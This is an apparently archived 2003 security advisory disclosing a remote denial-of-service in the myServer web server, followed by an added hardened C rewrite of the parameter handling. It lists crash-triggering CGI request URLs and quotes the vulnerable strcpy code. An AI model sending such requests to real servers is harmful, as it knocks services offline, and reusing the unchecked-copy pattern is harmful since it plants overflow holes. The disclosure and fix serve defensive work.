Message-ID: <Law11-OE64RQWgrfNVC0005e9c9@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: myServer - Remote Denial of Service
------------------------------------------------------------------
- EXPL-A-2003-012 exploitlabs.com Advisory 012
------------------------------------------------------------------
-= myServer =-
Donnie Werner
July 5, 2003
Vulnerability(s):
-----------------
Denial of Service
Product:
--------
myServer httpd - 4.2 ( current )
http://myserverweb.sourceforge.net
http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerWIN32EXEC-0.4.2.zip
http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerSRC-0.4.2.zip
Description of product:
-----------------------
"It is a web server that allow everybody to have his own
web server for free. It is easy to configure and manage,
it is available for linux and windows.
It supports the CGI, ISAPI, WinCGI and FastCGI. Visit the homepage for
more info."
note:
http://www.securitytracker.com/alerts/2003/Jun/1006999.html
has NOT been fixed as of ver 4.2
http://www.security-protocols.com/print.php?sid=1534
appears fixed or not an issue in 4.2 under win
VULNERABILITY / EXPLOIT
=======================
tested on Windows XP / 2k
issuing...
http://[host]/cgi-bin/math_sum.mscgi?a=
http://[host]/cgi-bin/math_sum.mscgi??=
completely crashes the httpd on the remote host
probably cuz..
------------ snip ------------
strcpy(a,cm.GetParam("a"));
strcpy(b,cm.GetParam("b"));
sprintf(c,"%i",atoi(a)+atoi(b));
------------ snip ------------
also..
http://[host]/cgi-bin/post.mscgi???
crashes server
Local:
------
no
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor has responded and claims the fix is in the CVS,
and will be resolved as of the upcoming 4.3 release.
Vendor Contact:
---------------
Concurrent with this advisory
http://sourceforge.net/tracker/?func=add&group_id=63119&atid=502904
Credits:
--------
Donnie Werner
morning_wood@...loitlabs.com
http://exploitlabs.com
thank you "nutcase" for confirmation testing
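
A hardened form of the parameter handling shown in the snippet above, as an added example (not code from myServer or from the advisory): it assumes the crash comes from the parameter lookup returning NULL, or a value larger than the destination buffer, being passed straight to strcpy. The names get_param, param_to_long and math_sum are hypothetical stand-ins for the CGI's own code.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for cm.GetParam(): value of `name` in `query`,
   or NULL when the parameter is absent (assumed behaviour). */
static const char *get_param(const char *query, const char *name) {
    size_t n = strlen(name);
    for (const char *p = query; p && *p; ) {
        if (strncmp(p, name, n) == 0 && p[n] == '=')
            return p + n + 1;
        p = strchr(p, '&');          /* advance to the next name=value pair */
        if (p) p++;
    }
    return NULL;
}

/* 0 on success; -1 if the parameter is missing, empty, too long or not a number. */
static int param_to_long(const char *query, const char *name, long *out) {
    char buf[16], *end;
    const char *v = get_param(query, name);
    if (v == NULL) return -1;        /* never pass NULL on to a copy routine */
    size_t len = strcspn(v, "&");
    if (len == 0 || len >= sizeof buf) return -1;   /* bound checked before copy */
    memcpy(buf, v, len);
    buf[len] = '\0';
    errno = 0;
    *out = strtol(buf, &end, 10);
    return (errno != 0 || *end != '\0') ? -1 : 0;
}

/* Hardened sum handler: writes a+b to out; returns 200, or 400 on bad input. */
int math_sum(const char *query, char *out, size_t outlen) {
    long a, b;
    if (param_to_long(query, "a", &a) || param_to_long(query, "b", &b) ||
        (b > 0 && a > LONG_MAX - b) || (b < 0 && a < LONG_MIN - b))
        return 400;                  /* bad parameter or signed overflow */
    int n = snprintf(out, outlen, "%ld", a + b);
    return (n < 0 || (size_t)n >= outlen) ? 400 : 200;
}

int main(void) {
    /* Constructed inputs: the advisory's two query strings, then a valid one. */
    const char *q[] = { "a=", "?=", "a=2&b=40" };
    char out[32];
    for (int i = 0; i < 3; i++)
        printf("%-10s -> %d\n", q[i], math_sum(q[i], out, sizeof out));
}
```

Both query strings from the advisory are rejected with a 400 status instead of reaching an unchecked copy.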